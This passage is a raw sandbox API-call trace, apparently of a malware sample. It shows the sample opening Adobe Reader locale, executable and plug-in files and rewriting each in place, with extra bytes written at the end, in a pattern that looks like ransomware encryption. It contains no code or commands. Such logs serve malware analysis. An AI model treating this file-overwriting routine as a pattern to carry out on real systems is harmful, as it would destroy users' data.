lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0078.990] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0078.990] ReleaseMutex (hMutex=0x168) returned 1 [0078.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.UKR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0078.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.UKR", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.UKR", lpUsedDefaultChar=0x0) returned 11 [0078.990] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0079.106] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7e600 [0079.106] ReadFile (in: hFile=0x1d8, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.118] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x7e600 [0079.118] WriteFile (in: hFile=0x1d8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.118] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0079.119] WriteFile (in: hFile=0x1d8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0079.119] CloseHandle (hObject=0x1d8) returned 1 [0079.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0079.120] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.120] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x108 [0079.120] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.121] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.121] ReleaseMutex (hMutex=0x168) returned 1 [0079.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.121] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0079.121] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef3218, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef3218*, lpNumberOfBytesRead=0x345f2bc*=0x108, lpOverlapped=0x0) returned 1 [0079.122] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0079.123] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x345f2d0*=0x690, lpOverlapped=0x0) returned 1 [0079.123] CloseHandle (hObject=0x1d8) returned 1 [0079.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\BRdlang32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\brdlang32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0079.126] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.126] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e00 [0079.126] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.127] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.127] ReleaseMutex (hMutex=0x168) returned 1 [0079.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CHS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CHS", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.CHS", lpUsedDefaultChar=0x0) returned 13 [0079.127] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x345f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0079.365] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0079.365] WriteFile (in: hFile=0x1d8, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x345f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0079.366] CloseHandle (hObject=0x1d8) returned 1 [0079.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Multimedia.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\multimedia.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0079.366] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.366] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xd800 [0079.367] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.367] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.367] ReleaseMutex (hMutex=0x168) returned 1 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CHS", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CHS", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.CHS", lpUsedDefaultChar=0x0) returned 14 [0079.367] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a8048, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0079.406] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xc800 [0079.406] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.408] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xc800 [0079.408] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.408] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0079.409] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa1a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa1a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0079.409] CloseHandle (hObject=0x1d8) returned 1 [0079.409] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\SendMail.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\sendmail.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0079.415] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.415] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2e00 [0079.415] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.416] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.416] ReleaseMutex (hMutex=0x168) returned 1 [0079.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CHS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CHS", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.CHS", lpUsedDefaultChar=0x0) returned 12 [0079.416] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.481] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1e00 [0079.481] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e965d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e965d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0079.809] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1e00 [0079.809] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0079.815] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0079.815] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0079.816] CloseHandle (hObject=0x1d8) returned 1 [0079.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\AdobeCollabSync.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\adobecollabsync.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0079.855] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.855] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1800 [0079.856] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0079.856] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0079.856] ReleaseMutex (hMutex=0x168) returned 1 [0079.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CHT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0079.856] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CHT", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.CHT", lpUsedDefaultChar=0x0) returned 19 [0079.856] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x345f2bc*=0x1800, lpOverlapped=0x0) returned 1 [0081.005] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.006] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1d88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x345f2d0*=0x1d88, lpOverlapped=0x0) returned 1 [0081.006] CloseHandle (hObject=0x1d8) returned 1 [0081.006] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\IA32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\ia32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.007] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.008] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xc00 [0081.008] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.008] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.008] ReleaseMutex (hMutex=0x168) returned 1 [0081.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CHT", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0081.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CHT", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.CHT", lpUsedDefaultChar=0x0) returned 8 [0081.008] ReadFile (in: hFile=0x1d8, lpBuffer=0x26698c8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesRead=0x345f2bc*=0xc00, lpOverlapped=0x0) returned 1 [0081.029] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0081.030] WriteFile (in: hFile=0x1d8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1188, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x345f2d0*=0x1188, lpOverlapped=0x0) returned 1 [0081.030] CloseHandle (hObject=0x1d8) returned 1 [0081.030] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\SaveAsRTF.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\saveasrtf.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.031] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.031] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3200 [0081.031] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.031] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.031] ReleaseMutex (hMutex=0x168) returned 1 [0081.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CHT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CHT", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.CHT", lpUsedDefaultChar=0x0) returned 13 [0081.032] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e967d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e967d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.036] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2200 [0081.036] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e967d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e967d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2200 [0081.097] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.097] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0081.097] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e967d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e967d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.097] CloseHandle (hObject=0x1d8) returned 1 [0081.098] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\LogTransport2.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logtransport2.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.099] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.099] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4d1e0 [0081.099] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0081.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.099] ReleaseMutex (hMutex=0x168) returned 1 [0081.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LogTransport2.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0081.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LogTransport2.exe", cchWideChar=17, lpMultiByteStr=0x1f88ba4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LogTransport2.exe", lpUsedDefaultChar=0x0) returned 17 [0081.099] ReadFile (in: hFile=0x1d8, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4c1e0 [0081.108] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e955a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e955a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.118] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4c1e0 [0081.118] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.119] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0081.119] WriteFile (in: hFile=0x1d8, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.119] CloseHandle (hObject=0x1d8) returned 1 [0081.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annots.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annots.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0081.120] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, 